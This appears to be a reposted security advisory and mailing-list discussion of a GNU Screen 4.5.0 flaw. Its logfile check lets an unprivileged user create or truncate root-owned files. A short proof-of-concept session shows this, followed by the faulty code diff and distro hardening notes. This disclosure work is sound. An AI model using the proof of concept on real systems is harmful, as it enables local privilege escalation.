GNU Screen 4.5.0 root exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>GNU Screen 4.5.0 root exploit </TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>The check opens the logfile with full root privileges. This allows us to truncate any file or create a root-owned file with any contents in any directory and can be easily exploited to full root access in several ways. address@hidden:~$ screen --version Screen version 4.05.00 (GNU) 10-Dec-16 address@hidden:~$ id uid=125(buczek) gid=125(buczek) groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw) address@hidden:~$ cd /etc address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail address@hidden:/etc (master)$ ls -l bla.bla -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla address@hidden:/etc (master)$ cat bla.bla fail address@hidden:/etc (master)$ Donald Buczek <address@hidden> --- There are some follow-ups, notably Axel Beckert pointing out that the issue appears to have been introduced on 2016-11-04 (not 2015-11-04): --- Commit f86a374 ("screen.c: adding permissions check for the logfile name", 2015-11-04) There is no such commit id, neither in the master branch nor in the screen-v4 branch. I assume you meant one of these two commits instead: master: http://git.savannah.gnu.org/cgit/screen.git/commit/?id=c575c40c9bd7653470639da32e06faed0a9b2ec4 screen-v4: http://git.savannah.gnu.org/cgit/screen.git/commit/?h=screen-v4&id=5460f5d28c01a9a58e021eb1dffef2965e629d58 The latter is the one included in Screen 4.5.0. --- The commits add this code: --- + FILE *w_check; + if ((w_check = fopen(screenlogfile, "w")) == NULL) + Panic(0, "-L: logfile name access problem"); + else + fclose(w_check); --- apparently into command-line option parsing in main(), thus apparently prior to dropping the privileges. (I didn't review this in context.) Last but not least, I hope distros don't install screen SUID root these days. If any distro does, this is yet another reminder to reconsider. Some install it SGID utmp. Some take it a step further - Owl and ALT Linux install it SGID to group screen, which only grants the ability to invoke utempter (SGID utmp) and tcp_chkpwd (SGID shadow). Thus, it'd take a vulnerability in those other tools to make much use of a screen vulnerability. Here's an excerpt from ALT Linux's spec file: %post ln -f %_libexecdir/chkpwd/tcb_chkpwd %_libexecdir/screen/ ln -f %_libexecdir/utempter/utempter %_libexecdir/screen/ %preun if [ $1 -eq 0 ]; then rm -f %_libexecdir/screen/{tcb_chkpwd,utempter} fi %triggerin -- pam_tcb >= 0.9.7.1 ln -f %_libexecdir/chkpwd/tcb_chkpwd %_libexecdir/screen/ %triggerin -- libutempter >= 1.0.6 ln -f %_libexecdir/utempter/utempter %_libexecdir/screen/ %files %attr(2711,root,screen) %_bindir/screen %attr(710,root,screen) %dir %_libexecdir/screen %attr(2711,root,shadow) %ghost %_libexecdir/screen/tcb_chkpwd %attr(2711,root,utmp) %ghost %_libexecdir/screen/utempter %attr(775,root,screen) %dir /var/run/screen/ Alexander</BODY></HTML>
